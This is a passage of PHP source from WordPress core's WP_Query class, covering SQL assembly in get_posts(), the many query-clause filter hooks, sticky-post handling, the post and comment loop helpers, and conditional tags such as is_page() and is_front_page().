@since 2.2.0 * * @param string $cwhere The WHERE clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $cwhere = apply_filters_ref_array( 'comment_feed_where', array( $cwhere, &$this ) ); /** * Filters the GROUP BY clause of the comments feed query before sending. * * @since 2.2.0 * * @param string $cgroupby The GROUP BY clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $cgroupby = apply_filters_ref_array( 'comment_feed_groupby', array( $cgroupby, &$this ) ); /** * Filters the ORDER BY clause of the comments feed query before sending. * * @since 2.8.0 * * @param string $corderby The ORDER BY clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $corderby = apply_filters_ref_array( 'comment_feed_orderby', array( 'comment_date_gmt DESC', &$this ) ); /** * Filters the LIMIT clause of the comments feed query before sending. * * @since 2.8.0 * * @param string $climits The JOIN clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $climits = apply_filters_ref_array( 'comment_feed_limits', array( 'LIMIT ' . get_option( 'posts_per_rss' ), &$this ) ); } $cgroupby = ( ! empty( $cgroupby ) ) ? 'GROUP BY ' . $cgroupby : ''; $corderby = ( ! empty( $corderby ) ) ? 'ORDER BY ' . $corderby : ''; $comments = (array) $wpdb->get_results( "SELECT $distinct {$wpdb->comments}.* FROM {$wpdb->comments} $cjoin $cwhere $cgroupby $corderby $climits" ); // Convert to WP_Comment $this->comments = array_map( 'get_comment', $comments ); $this->comment_count = count( $this->comments ); $post_ids = array(); foreach ( $this->comments as $comment ) { $post_ids[] = (int) $comment->comment_post_ID; } $post_ids = join( ',', $post_ids ); $join = ''; if ( $post_ids ) { $where = "AND {$wpdb->posts}.ID IN ($post_ids) "; } else { $where = 'AND 0'; } } $pieces = array( 'where', 'groupby', 'join', 'orderby', 'distinct', 'fields', 'limits' ); /* * Apply post-paging filters on where and join. Only plugins that * manipulate paging queries should use these hooks. */ if ( ! $q['suppress_filters'] ) { /** * Filters the WHERE clause of the query. * * Specifically for manipulating paging queries. * * @since 1.5.0 * * @param string $where The WHERE clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $where = apply_filters_ref_array( 'posts_where_paged', array( $where, &$this ) ); /** * Filters the GROUP BY clause of the query. * * @since 2.0.0 * * @param string $groupby The GROUP BY clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $groupby = apply_filters_ref_array( 'posts_groupby', array( $groupby, &$this ) ); /** * Filters the JOIN clause of the query. * * Specifically for manipulating paging queries. * * @since 1.5.0 * * @param string $join The JOIN clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $join = apply_filters_ref_array( 'posts_join_paged', array( $join, &$this ) ); /** * Filters the ORDER BY clause of the query. * * @since 1.5.1 * * @param string $orderby The ORDER BY clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $orderby = apply_filters_ref_array( 'posts_orderby', array( $orderby, &$this ) ); /** * Filters the DISTINCT clause of the query. * * @since 2.1.0 * * @param string $distinct The DISTINCT clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $distinct = apply_filters_ref_array( 'posts_distinct', array( $distinct, &$this ) ); /** * Filters the LIMIT clause of the query. * * @since 2.1.0 * * @param string $limits The LIMIT clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $limits = apply_filters_ref_array( 'post_limits', array( $limits, &$this ) ); /** * Filters the SELECT clause of the query. * * @since 2.1.0 * * @param string $fields The SELECT clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $fields = apply_filters_ref_array( 'posts_fields', array( $fields, &$this ) ); /** * Filters all query clauses at once, for convenience. * * Covers the WHERE, GROUP BY, JOIN, ORDER BY, DISTINCT, * fields (SELECT), and LIMITS clauses. * * @since 3.1.0 * * @param string[] $clauses Associative array of the clauses for the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $clauses = (array) apply_filters_ref_array( 'posts_clauses', array( compact( $pieces ), &$this ) ); $where = isset( $clauses['where'] ) ? $clauses['where'] : ''; $groupby = isset( $clauses['groupby'] ) ? $clauses['groupby'] : ''; $join = isset( $clauses['join'] ) ? $clauses['join'] : ''; $orderby = isset( $clauses['orderby'] ) ? $clauses['orderby'] : ''; $distinct = isset( $clauses['distinct'] ) ? $clauses['distinct'] : ''; $fields = isset( $clauses['fields'] ) ? $clauses['fields'] : ''; $limits = isset( $clauses['limits'] ) ? $clauses['limits'] : ''; } /** * Fires to announce the query's current selection parameters. * * For use by caching plugins. * * @since 2.3.0 * * @param string $selection The assembled selection query. */ do_action( 'posts_selection', $where . $groupby . $orderby . $limits . $join ); /* * Filters again for the benefit of caching plugins. * Regular plugins should use the hooks above. */ if ( ! $q['suppress_filters'] ) { /** * Filters the WHERE clause of the query. * * For use by caching plugins. * * @since 2.5.0 * * @param string $where The WHERE clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $where = apply_filters_ref_array( 'posts_where_request', array( $where, &$this ) ); /** * Filters the GROUP BY clause of the query. * * For use by caching plugins. * * @since 2.5.0 * * @param string $groupby The GROUP BY clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $groupby = apply_filters_ref_array( 'posts_groupby_request', array( $groupby, &$this ) ); /** * Filters the JOIN clause of the query. * * For use by caching plugins. * * @since 2.5.0 * * @param string $join The JOIN clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $join = apply_filters_ref_array( 'posts_join_request', array( $join, &$this ) ); /** * Filters the ORDER BY clause of the query. * * For use by caching plugins. * * @since 2.5.0 * * @param string $orderby The ORDER BY clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $orderby = apply_filters_ref_array( 'posts_orderby_request', array( $orderby, &$this ) ); /** * Filters the DISTINCT clause of the query. * * For use by caching plugins. * * @since 2.5.0 * * @param string $distinct The DISTINCT clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $distinct = apply_filters_ref_array( 'posts_distinct_request', array( $distinct, &$this ) ); /** * Filters the SELECT clause of the query. * * For use by caching plugins. * * @since 2.5.0 * * @param string $fields The SELECT clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $fields = apply_filters_ref_array( 'posts_fields_request', array( $fields, &$this ) ); /** * Filters the LIMIT clause of the query. * * For use by caching plugins. * * @since 2.5.0 * * @param string $limits The LIMIT clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $limits = apply_filters_ref_array( 'post_limits_request', array( $limits, &$this ) ); /** * Filters all query clauses at once, for convenience. * * For use by caching plugins. * * Covers the WHERE, GROUP BY, JOIN, ORDER BY, DISTINCT, * fields (SELECT), and LIMITS clauses. * * @since 3.1.0 * * @param string[] $pieces Associative array of the pieces of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $clauses = (array) apply_filters_ref_array( 'posts_clauses_request', array( compact( $pieces ), &$this ) ); $where = isset( $clauses['where'] ) ? $clauses['where'] : ''; $groupby = isset( $clauses['groupby'] ) ? $clauses['groupby'] : ''; $join = isset( $clauses['join'] ) ? $clauses['join'] : ''; $orderby = isset( $clauses['orderby'] ) ? $clauses['orderby'] : ''; $distinct = isset( $clauses['distinct'] ) ? $clauses['distinct'] : ''; $fields = isset( $clauses['fields'] ) ? $clauses['fields'] : ''; $limits = isset( $clauses['limits'] ) ? $clauses['limits'] : ''; } if ( ! empty( $groupby ) ) { $groupby = 'GROUP BY ' . $groupby; } if ( ! empty( $orderby ) ) { $orderby = 'ORDER BY ' . $orderby; } $found_rows = ''; if ( ! $q['no_found_rows'] && ! empty( $limits ) ) { $found_rows = 'SQL_CALC_FOUND_ROWS'; } $this->request = $old_request = "SELECT $found_rows $distinct $fields FROM {$wpdb->posts} $join WHERE 1=1 $where $groupby $orderby $limits"; if ( ! $q['suppress_filters'] ) { /** * Filters the completed SQL query before sending. * * @since 2.0.0 * * @param string $request The complete SQL query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $this->request = apply_filters_ref_array( 'posts_request', array( $this->request, &$this ) ); } /** * Filters the posts array before the query takes place. * * Return a non-null value to bypass WordPress's default post queries. * * Filtering functions that require pagination information are encouraged to set * the `found_posts` and `max_num_pages` properties of the WP_Query object, * passed to the filter by reference. If WP_Query does not perform a database * query, it will not have enough information to generate these values itself. * * @since 4.6.0 * * @param array|null $posts Return an array of post data to short-circuit WP's query, * or null to allow WP to run its normal queries. * @param WP_Query $this The WP_Query instance (passed by reference). */ $this->posts = apply_filters_ref_array( 'posts_pre_query', array( null, &$this ) ); if ( 'ids' == $q['fields'] ) { if ( null === $this->posts ) { $this->posts = $wpdb->get_col( $this->request ); } $this->posts = array_map( 'intval', $this->posts ); $this->post_count = count( $this->posts ); $this->set_found_posts( $q, $limits ); return $this->posts; } if ( 'id=>parent' == $q['fields'] ) { if ( null === $this->posts ) { $this->posts = $wpdb->get_results( $this->request ); } $this->post_count = count( $this->posts ); $this->set_found_posts( $q, $limits ); $r = array(); foreach ( $this->posts as $key => $post ) { $this->posts[ $key ]->ID = (int) $post->ID; $this->posts[ $key ]->post_parent = (int) $post->post_parent; $r[ (int) $post->ID ] = (int) $post->post_parent; } return $r; } if ( null === $this->posts ) { $split_the_query = ( $old_request == $this->request && "{$wpdb->posts}.*" == $fields && ! empty( $limits ) && $q['posts_per_page'] < 500 ); /** * Filters whether to split the query. * * Splitting the query will cause it to fetch just the IDs of the found posts * (and then individually fetch each post by ID), rather than fetching every * complete row at once. One massive result vs. many small results. * * @since 3.4.0 * * @param bool $split_the_query Whether or not to split the query. * @param WP_Query $this The WP_Query instance. */ $split_the_query = apply_filters( 'split_the_query', $split_the_query, $this ); if ( $split_the_query ) { // First get the IDs and then fill in the objects $this->request = "SELECT $found_rows $distinct {$wpdb->posts}.ID FROM {$wpdb->posts} $join WHERE 1=1 $where $groupby $orderby $limits"; /** * Filters the Post IDs SQL request before sending. * * @since 3.4.0 * * @param string $request The post ID request. * @param WP_Query $this The WP_Query instance. */ $this->request = apply_filters( 'posts_request_ids', $this->request, $this ); $ids = $wpdb->get_col( $this->request ); if ( $ids ) { $this->posts = $ids; $this->set_found_posts( $q, $limits ); _prime_post_caches( $ids, $q['update_post_term_cache'], $q['update_post_meta_cache'] ); } else { $this->posts = array(); } } else { $this->posts = $wpdb->get_results( $this->request ); $this->set_found_posts( $q, $limits ); } } // Convert to WP_Post objects. if ( $this->posts ) { $this->posts = array_map( 'get_post', $this->posts ); } if ( ! $q['suppress_filters'] ) { /** * Filters the raw post results array, prior to status checks. * * @since 2.3.0 * * @param WP_Post[] $posts Array of post objects. * @param WP_Query $this The WP_Query instance (passed by reference). */ $this->posts = apply_filters_ref_array( 'posts_results', array( $this->posts, &$this ) ); } if ( ! empty( $this->posts ) && $this->is_comment_feed && $this->is_singular ) { /** This filter is documented in wp-includes/query.php */ $cjoin = apply_filters_ref_array( 'comment_feed_join', array( '', &$this ) ); /** This filter is documented in wp-includes/query.php */ $cwhere = apply_filters_ref_array( 'comment_feed_where', array( "WHERE comment_post_ID = '{$this->posts[0]->ID}' AND comment_approved = '1'", &$this ) ); /** This filter is documented in wp-includes/query.php */ $cgroupby = apply_filters_ref_array( 'comment_feed_groupby', array( '', &$this ) ); $cgroupby = ( ! empty( $cgroupby ) ) ? 'GROUP BY ' . $cgroupby : ''; /** This filter is documented in wp-includes/query.php */ $corderby = apply_filters_ref_array( 'comment_feed_orderby', array( 'comment_date_gmt DESC', &$this ) ); $corderby = ( ! empty( $corderby ) ) ? 'ORDER BY ' . $corderby : ''; /** This filter is documented in wp-includes/query.php */ $climits = apply_filters_ref_array( 'comment_feed_limits', array( 'LIMIT ' . get_option( 'posts_per_rss' ), &$this ) ); $comments_request = "SELECT {$wpdb->comments}.* FROM {$wpdb->comments} $cjoin $cwhere $cgroupby $corderby $climits"; $comments = $wpdb->get_results( $comments_request ); // Convert to WP_Comment $this->comments = array_map( 'get_comment', $comments ); $this->comment_count = count( $this->comments ); } // Check post status to determine if post should be displayed. if ( ! empty( $this->posts ) && ( $this->is_single || $this->is_page ) ) { $status = get_post_status( $this->posts[0] ); if ( 'attachment' === $this->posts[0]->post_type && 0 === (int) $this->posts[0]->post_parent ) { $this->is_page = false; $this->is_single = true; $this->is_attachment = true; } $post_status_obj = get_post_status_object( $status ); // If the post_status was specifically requested, let it pass through. if ( ! $post_status_obj->public && ! in_array( $status, $q_status ) ) { if ( ! is_user_logged_in() ) { // User must be logged in to view unpublished posts. $this->posts = array(); } else { if ( $post_status_obj->protected ) { // User must have edit permissions on the draft to preview. if ( ! current_user_can( $edit_cap, $this->posts[0]->ID ) ) { $this->posts = array(); } else { $this->is_preview = true; if ( 'future' != $status ) { $this->posts[0]->post_date = current_time( 'mysql' ); } } } elseif ( $post_status_obj->private ) { if ( ! current_user_can( $read_cap, $this->posts[0]->ID ) ) { $this->posts = array(); } } else { $this->posts = array(); } } } if ( $this->is_preview && $this->posts && current_user_can( $edit_cap, $this->posts[0]->ID ) ) { /** * Filters the single post for preview mode. * * @since 2.7.0 * * @param WP_Post $post_preview The Post object. * @param WP_Query $this The WP_Query instance (passed by reference). */ $this->posts[0] = get_post( apply_filters_ref_array( 'the_preview', array( $this->posts[0], &$this ) ) ); } } // Put sticky posts at the top of the posts array $sticky_posts = get_option( 'sticky_posts' ); if ( $this->is_home && $page <= 1 && is_array( $sticky_posts ) && ! empty( $sticky_posts ) && ! $q['ignore_sticky_posts'] ) { $num_posts = count( $this->posts ); $sticky_offset = 0; // Loop over posts and relocate stickies to the front. for ( $i = 0; $i < $num_posts; $i++ ) { if ( in_array( $this->posts[ $i ]->ID, $sticky_posts ) ) { $sticky_post = $this->posts[ $i ]; // Remove sticky from current position array_splice( $this->posts, $i, 1 ); // Move to front, after other stickies array_splice( $this->posts, $sticky_offset, 0, array( $sticky_post ) ); // Increment the sticky offset. The next sticky will be placed at this offset. $sticky_offset++; // Remove post from sticky posts array $offset = array_search( $sticky_post->ID, $sticky_posts ); unset( $sticky_posts[ $offset ] ); } } // If any posts have been excluded specifically, Ignore those that are sticky. if ( ! empty( $sticky_posts ) && ! empty( $q['post__not_in'] ) ) { $sticky_posts = array_diff( $sticky_posts, $q['post__not_in'] ); } // Fetch sticky posts that weren't in the query results if ( ! empty( $sticky_posts ) ) { $stickies = get_posts( array( 'post__in' => $sticky_posts, 'post_type' => $post_type, 'post_status' => 'publish', 'nopaging' => true, ) ); foreach ( $stickies as $sticky_post ) { array_splice( $this->posts, $sticky_offset, 0, array( $sticky_post ) ); $sticky_offset++; } } } // If comments have been fetched as part of the query, make sure comment meta lazy-loading is set up. if ( ! empty( $this->comments ) ) { wp_queue_comments_for_comment_meta_lazyload( $this->comments ); } if ( ! $q['suppress_filters'] ) { /** * Filters the array of retrieved posts after they've been fetched and * internally processed. * * @since 1.5.0 * * @param WP_Post[] $posts Array of post objects. * @param WP_Query $this The WP_Query instance (passed by reference). */ $this->posts = apply_filters_ref_array( 'the_posts', array( $this->posts, &$this ) ); } // Ensure that any posts added/modified via one of the filters above are // of the type WP_Post and are filtered. if ( $this->posts ) { $this->post_count = count( $this->posts ); $this->posts = array_map( 'get_post', $this->posts ); if ( $q['cache_results'] ) { update_post_caches( $this->posts, $post_type, $q['update_post_term_cache'], $q['update_post_meta_cache'] ); } $this->post = reset( $this->posts ); } else { $this->post_count = 0; $this->posts = array(); } if ( $q['lazy_load_term_meta'] ) { wp_queue_posts_for_term_meta_lazyload( $this->posts ); } return $this->posts; } /** * Set up the amount of found posts and the number of pages (if limit clause was used) * for the current query. * * @since 3.5.0 * * @param array $q Query variables. * @param string $limits LIMIT clauses of the query. */ private function set_found_posts( $q, $limits ) { global $wpdb; // Bail if posts is an empty array. Continue if posts is an empty string, // null, or false to accommodate caching plugins that fill posts later. if ( $q['no_found_rows'] || ( is_array( $this->posts ) && ! $this->posts ) ) { return; } if ( ! empty( $limits ) ) { /** * Filters the query to run for retrieving the found posts. * * @since 2.1.0 * * @param string $found_posts The query to run to find the found posts. * @param WP_Query $this The WP_Query instance (passed by reference). */ $this->found_posts = $wpdb->get_var( apply_filters_ref_array( 'found_posts_query', array( 'SELECT FOUND_ROWS()', &$this ) ) ); } else { if ( is_array( $this->posts ) ) { $this->found_posts = count( $this->posts ); } else { if ( null === $this->posts ) { $this->found_posts = 0; } else { $this->found_posts = 1; } } } /** * Filters the number of found posts for the query. * * @since 2.1.0 * * @param int $found_posts The number of posts found. * @param WP_Query $this The WP_Query instance (passed by reference). */ $this->found_posts = apply_filters_ref_array( 'found_posts', array( $this->found_posts, &$this ) ); if ( ! empty( $limits ) ) { $this->max_num_pages = ceil( $this->found_posts / $q['posts_per_page'] ); } } /** * Set up the next post and iterate current post index. * * @since 1.5.0 * * @return WP_Post Next post. */ public function next_post() { $this->current_post++; $this->post = $this->posts[ $this->current_post ]; return $this->post; } /** * Sets up the current post. * * Retrieves the next post, sets up the post, sets the 'in the loop' * property to true. * * @since 1.5.0 * * @global WP_Post $post */ public function the_post() { global $post; $this->in_the_loop = true; if ( $this->current_post == -1 ) { // loop has just started /** * Fires once the loop is started. * * @since 2.0.0 * * @param WP_Query $this The WP_Query instance (passed by reference). */ do_action_ref_array( 'loop_start', array( &$this ) ); } $post = $this->next_post(); $this->setup_postdata( $post ); } /** * Determines whether there are more posts available in the loop. * * Calls the {@see 'loop_end'} action when the loop is complete. * * @since 1.5.0 * * @return bool True if posts are available, false if end of loop. */ public function have_posts() { if ( $this->current_post + 1 < $this->post_count ) { return true; } elseif ( $this->current_post + 1 == $this->post_count && $this->post_count > 0 ) { /** * Fires once the loop has ended. * * @since 2.0.0 * * @param WP_Query $this The WP_Query instance (passed by reference). */ do_action_ref_array( 'loop_end', array( &$this ) ); // Do some cleaning up after the loop $this->rewind_posts(); } elseif ( 0 === $this->post_count ) { /** * Fires if no results are found in a post query. * * @since 4.9.0 * * @param WP_Query $this The WP_Query instance. */ do_action( 'loop_no_results', $this ); } $this->in_the_loop = false; return false; } /** * Rewind the posts and reset post index. * * @since 1.5.0 */ public function rewind_posts() { $this->current_post = -1; if ( $this->post_count > 0 ) { $this->post = $this->posts[0]; } } /** * Iterate current comment index and return WP_Comment object. * * @since 2.2.0 * * @return WP_Comment Comment object. */ public function next_comment() { $this->current_comment++; $this->comment = $this->comments[ $this->current_comment ]; return $this->comment; } /** * Sets up the current comment. * * @since 2.2.0 * @global WP_Comment $comment Current comment. */ public function the_comment() { global $comment; $comment = $this->next_comment(); if ( $this->current_comment == 0 ) { /** * Fires once the comment loop is started. * * @since 2.2.0 */ do_action( 'comment_loop_start' ); } } /** * Whether there are more comments available. * * Automatically rewinds comments when finished. * * @since 2.2.0 * * @return bool True, if more comments. False, if no more posts. */ public function have_comments() { if ( $this->current_comment + 1 < $this->comment_count ) { return true; } elseif ( $this->current_comment + 1 == $this->comment_count ) { $this->rewind_comments(); } return false; } /** * Rewind the comments, resets the comment index and comment to first. * * @since 2.2.0 */ public function rewind_comments() { $this->current_comment = -1; if ( $this->comment_count > 0 ) { $this->comment = $this->comments[0]; } } /** * Sets up the WordPress query by parsing query string. * * @since 1.5.0 * * @param string|array $query URL query string or array of query arguments. * @return WP_Post[]|int[] Array of post objects or post IDs. */ public function query( $query ) { $this->init(); $this->query = $this->query_vars = wp_parse_args( $query ); return $this->get_posts(); } /** * Retrieve queried object. * * If queried object is not set, then the queried object will be set from * the category, tag, taxonomy, posts page, single post, page, or author * query variable. After it is set up, it will be returned. * * @since 1.5.0 * * @return object */ public function get_queried_object() { if ( isset( $this->queried_object ) ) { return $this->queried_object; } $this->queried_object = null; $this->queried_object_id = null; if ( $this->is_category || $this->is_tag || $this->is_tax ) { if ( $this->is_category ) { if ( $this->get( 'cat' ) ) { $term = get_term( $this->get( 'cat' ), 'category' ); } elseif ( $this->get( 'category_name' ) ) { $term = get_term_by( 'slug', $this->get( 'category_name' ), 'category' ); } } elseif ( $this->is_tag ) { if ( $this->get( 'tag_id' ) ) { $term = get_term( $this->get( 'tag_id' ), 'post_tag' ); } elseif ( $this->get( 'tag' ) ) { $term = get_term_by( 'slug', $this->get( 'tag' ), 'post_tag' ); } } else { // For other tax queries, grab the first term from the first clause. if ( ! empty( $this->tax_query->queried_terms ) ) { $queried_taxonomies = array_keys( $this->tax_query->queried_terms ); $matched_taxonomy = reset( $queried_taxonomies ); $query = $this->tax_query->queried_terms[ $matched_taxonomy ]; if ( ! empty( $query['terms'] ) ) { if ( 'term_id' == $query['field'] ) { $term = get_term( reset( $query['terms'] ), $matched_taxonomy ); } else { $term = get_term_by( $query['field'], reset( $query['terms'] ), $matched_taxonomy ); } } } } if ( ! empty( $term ) && ! is_wp_error( $term ) ) { $this->queried_object = $term; $this->queried_object_id = (int) $term->term_id; if ( $this->is_category && 'category' === $this->queried_object->taxonomy ) { _make_cat_compat( $this->queried_object ); } } } elseif ( $this->is_post_type_archive ) { $post_type = $this->get( 'post_type' ); if ( is_array( $post_type ) ) { $post_type = reset( $post_type ); } $this->queried_object = get_post_type_object( $post_type ); } elseif ( $this->is_posts_page ) { $page_for_posts = get_option( 'page_for_posts' ); $this->queried_object = get_post( $page_for_posts ); $this->queried_object_id = (int) $this->queried_object->ID; } elseif ( $this->is_singular && ! empty( $this->post ) ) { $this->queried_object = $this->post; $this->queried_object_id = (int) $this->post->ID; } elseif ( $this->is_author ) { $this->queried_object_id = (int) $this->get( 'author' ); $this->queried_object = get_userdata( $this->queried_object_id ); } return $this->queried_object; } /** * Retrieve ID of the current queried object. * * @since 1.5.0 * * @return int */ public function get_queried_object_id() { $this->get_queried_object(); if ( isset( $this->queried_object_id ) ) { return $this->queried_object_id; } return 0; } /** * Constructor. * * Sets up the WordPress query, if parameter is not empty. * * @since 1.5.0 * * @param string|array $query URL query string or array of vars. */ public function __construct( $query = '' ) { if ( ! empty( $query ) ) { $this->query( $query ); } } /** * Make private properties readable for backward compatibility. * * @since 4.0.0 * * @param string $name Property to get. * @return mixed Property. */ public function __get( $name ) { if ( in_array( $name, $this->compat_fields ) ) { return $this->$name; } } /** * Make private properties checkable for backward compatibility. * * @since 4.0.0 * * @param string $name Property to check if set. * @return bool Whether the property is set. */ public function __isset( $name ) { if ( in_array( $name, $this->compat_fields ) ) { return isset( $this->$name ); } } /** * Make private/protected methods readable for backward compatibility. * * @since 4.0.0 * * @param string $name Method to call. * @param array $arguments Arguments to pass when calling. * @return mixed|false Return value of the callback, false otherwise. */ public function __call( $name, $arguments ) { if ( in_array( $name, $this->compat_methods ) ) { return call_user_func_array( array( $this, $name ), $arguments ); } return false; } /** * Is the query for an existing archive page? * * Month, Year, Category, Author, Post Type archive... * * @since 3.1.0 * * @return bool */ public function is_archive() { return (bool) $this->is_archive; } /** * Is the query for an existing post type archive page? * * @since 3.1.0 * * @param mixed $post_types Optional. Post type or array of posts types to check against. * @return bool */ public function is_post_type_archive( $post_types = '' ) { if ( empty( $post_types ) || ! $this->is_post_type_archive ) { return (bool) $this->is_post_type_archive; } $post_type = $this->get( 'post_type' ); if ( is_array( $post_type ) ) { $post_type = reset( $post_type ); } $post_type_object = get_post_type_object( $post_type ); return in_array( $post_type_object->name, (array) $post_types ); } /** * Is the query for an existing attachment page? * * @since 3.1.0 * * @param mixed $attachment Attachment ID, title, slug, or array of such. * @return bool */ public function is_attachment( $attachment = '' ) { if ( ! $this->is_attachment ) { return false; } if ( empty( $attachment ) ) { return true; } $attachment = array_map( 'strval', (array) $attachment ); $post_obj = $this->get_queried_object(); if ( in_array( (string) $post_obj->ID, $attachment ) ) { return true; } elseif ( in_array( $post_obj->post_title, $attachment ) ) { return true; } elseif ( in_array( $post_obj->post_name, $attachment ) ) { return true; } return false; } /** * Is the query for an existing author archive page? * * If the $author parameter is specified, this function will additionally * check if the query is for one of the authors specified. * * @since 3.1.0 * * @param mixed $author Optional. User ID, nickname, nicename, or array of User IDs, nicknames, and nicenames * @return bool */ public function is_author( $author = '' ) { if ( ! $this->is_author ) { return false; } if ( empty( $author ) ) { return true; } $author_obj = $this->get_queried_object(); $author = array_map( 'strval', (array) $author ); if ( in_array( (string) $author_obj->ID, $author ) ) { return true; } elseif ( in_array( $author_obj->nickname, $author ) ) { return true; } elseif ( in_array( $author_obj->user_nicename, $author ) ) { return true; } return false; } /** * Is the query for an existing category archive page? * * If the $category parameter is specified, this function will additionally * check if the query is for one of the categories specified. * * @since 3.1.0 * * @param mixed $category Optional. Category ID, name, slug, or array of Category IDs, names, and slugs. * @return bool */ public function is_category( $category = '' ) { if ( ! $this->is_category ) { return false; } if ( empty( $category ) ) { return true; } $cat_obj = $this->get_queried_object(); $category = array_map( 'strval', (array) $category ); if ( in_array( (string) $cat_obj->term_id, $category ) ) { return true; } elseif ( in_array( $cat_obj->name, $category ) ) { return true; } elseif ( in_array( $cat_obj->slug, $category ) ) { return true; } return false; } /** * Is the query for an existing tag archive page? * * If the $tag parameter is specified, this function will additionally * check if the query is for one of the tags specified. * * @since 3.1.0 * * @param mixed $tag Optional. Tag ID, name, slug, or array of Tag IDs, names, and slugs. * @return bool */ public function is_tag( $tag = '' ) { if ( ! $this->is_tag ) { return false; } if ( empty( $tag ) ) { return true; } $tag_obj = $this->get_queried_object(); $tag = array_map( 'strval', (array) $tag ); if ( in_array( (string) $tag_obj->term_id, $tag ) ) { return true; } elseif ( in_array( $tag_obj->name, $tag ) ) { return true; } elseif ( in_array( $tag_obj->slug, $tag ) ) { return true; } return false; } /** * Is the query for an existing custom taxonomy archive page? * * If the $taxonomy parameter is specified, this function will additionally * check if the query is for that specific $taxonomy. * * If the $term parameter is specified in addition to the $taxonomy parameter, * this function will additionally check if the query is for one of the terms * specified. * * @since 3.1.0 * * @global array $wp_taxonomies * * @param mixed $taxonomy Optional. Taxonomy slug or slugs. * @param mixed $term Optional. Term ID, name, slug or array of Term IDs, names, and slugs. * @return bool True for custom taxonomy archive pages, false for built-in taxonomies (category and tag archives). */ public function is_tax( $taxonomy = '', $term = '' ) { global $wp_taxonomies; if ( ! $this->is_tax ) { return false; } if ( empty( $taxonomy ) ) { return true; } $queried_object = $this->get_queried_object(); $tax_array = array_intersect( array_keys( $wp_taxonomies ), (array) $taxonomy ); $term_array = (array) $term; // Check that the taxonomy matches. if ( ! ( isset( $queried_object->taxonomy ) && count( $tax_array ) && in_array( $queried_object->taxonomy, $tax_array ) ) ) { return false; } // Only a Taxonomy provided. if ( empty( $term ) ) { return true; } return isset( $queried_object->term_id ) && count( array_intersect( array( $queried_object->term_id, $queried_object->name, $queried_object->slug ), $term_array ) ); } /** * Whether the current URL is within the comments popup window. * * @since 3.1.0 * @deprecated 4.5.0 * * @return bool */ public function is_comments_popup() { _deprecated_function( __FUNCTION__, '4.5.0' ); return false; } /** * Is the query for an existing date archive? * * @since 3.1.0 * * @return bool */ public function is_date() { return (bool) $this->is_date; } /** * Is the query for an existing day archive? * * @since 3.1.0 * * @return bool */ public function is_day() { return (bool) $this->is_day; } /** * Is the query for a feed? * * @since 3.1.0 * * @param string|array $feeds Optional feed types to check. * @return bool */ public function is_feed( $feeds = '' ) { if ( empty( $feeds ) || ! $this->is_feed ) { return (bool) $this->is_feed; } $qv = $this->get( 'feed' ); if ( 'feed' == $qv ) { $qv = get_default_feed(); } return in_array( $qv, (array) $feeds ); } /** * Is the query for a comments feed? * * @since 3.1.0 * * @return bool */ public function is_comment_feed() { return (bool) $this->is_comment_feed; } /** * Is the query for the front page of the site? * * This is for what is displayed at your site's main URL. * * Depends on the site's "Front page displays" Reading Settings 'show_on_front' and 'page_on_front'. * * If you set a static page for the front page of your site, this function will return * true when viewing that page. * * Otherwise the same as @see WP_Query::is_home() * * @since 3.1.0 * * @return bool True, if front of site. */ public function is_front_page() { // most likely case if ( 'posts' == get_option( 'show_on_front' ) && $this->is_home() ) { return true; } elseif ( 'page' == get_option( 'show_on_front' ) && get_option( 'page_on_front' ) && $this->is_page( get_option( 'page_on_front' ) ) ) { return true; } else { return false; } } /** * Is the query for the blog homepage? * * This is the page which shows the time based blog content of your site. * * Depends on the site's "Front page displays" Reading Settings 'show_on_front' and 'page_for_posts'. * * If you set a static page for the front page of your site, this function will return * true only on the page you set as the "Posts page". * * @see WP_Query::is_front_page() * * @since 3.1.0 * * @return bool True if blog view homepage. */ public function is_home() { return (bool) $this->is_home; } /** * Is the query for the Privacy Policy page? * * This is the page which shows the Privacy Policy content of your site. * * Depends on the site's "Change your Privacy Policy page" Privacy Settings 'wp_page_for_privacy_policy'. * * This function will return true only on the page you set as the "Privacy Policy page". * * @since 5.2.0 * * @return bool True, if Privacy Policy page. */ public function is_privacy_policy() { if ( get_option( 'wp_page_for_privacy_policy' ) && $this->is_page( get_option( 'wp_page_for_privacy_policy' ) ) ) { return true; } else { return false; } } /** * Is the query for an existing month archive? * * @since 3.1.0 * * @return bool */ public function is_month() { return (bool) $this->is_month; } /** * Is the query for an existing single page? * * If the $page parameter is specified, this function will additionally * check if the query is for one of the pages specified. * * @see WP_Query::is_single() * @see WP_Query::is_singular() * * @since 3.1.0 * * @param int|string|array $page Optional. Page ID, title, slug, path, or array of such. Default empty. * @return bool Whether the query is for an existing single page. */ public function is_page( $page = '' ) { if ( ! $this->is_page ) { return false; } if ( empty( $page ) ) { return true; } $page_obj = $this->get_queried_object(); $page = array_map( 'strval', (array) $page ); if ( in_array( (string) $page_obj->ID, $page ) ) { return true; } elseif ( in_array( $page_obj->post_title, $page ) ) { return true; } elseif ( in_array( $page_obj->post_name, $page ) ) { return true; } else { foreach ( $page as $pagepath ) { if ( ! strpos( $pagepath, '/' ) ) { continue; } $pagepath_obj = get_page_by_path( $pagepath ); if ( $pagepath_obj && ( $pagepath_obj->ID == $page_obj->ID ) ) { return true; } } } return false; } /** * Is the query for paged result and not for the first page? * * @since 3.1.0 * * @return bool */ public function is_paged() { return (bool) $this->is_paged; } /** * Is the query for a post or page preview? * * @since 3.1.0 